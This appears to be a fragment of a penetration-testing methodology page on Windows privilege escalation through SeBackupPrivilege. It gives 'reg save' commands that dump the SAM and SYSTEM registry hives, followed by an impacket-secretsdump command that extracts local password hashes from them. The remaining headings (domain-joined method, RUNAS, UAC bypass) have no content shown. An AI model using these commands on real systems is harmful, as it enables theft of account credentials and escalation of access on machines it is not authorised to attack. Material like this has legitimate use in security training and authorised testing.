Methodology
SEBackupPrivilege
reg save hklm\sam c:\users\username\sam
reg save hklm\system c:\users\username\system
# download sam and system on your kali machine and then use impacket-secretdump
impacket-secretsdump -sam sam -system system LOCAL


Second Method : SEBackupPrivilege (Domain Joined Machines)

RUNAS (Changing user Sessions)
Bypassing UAC
Last updated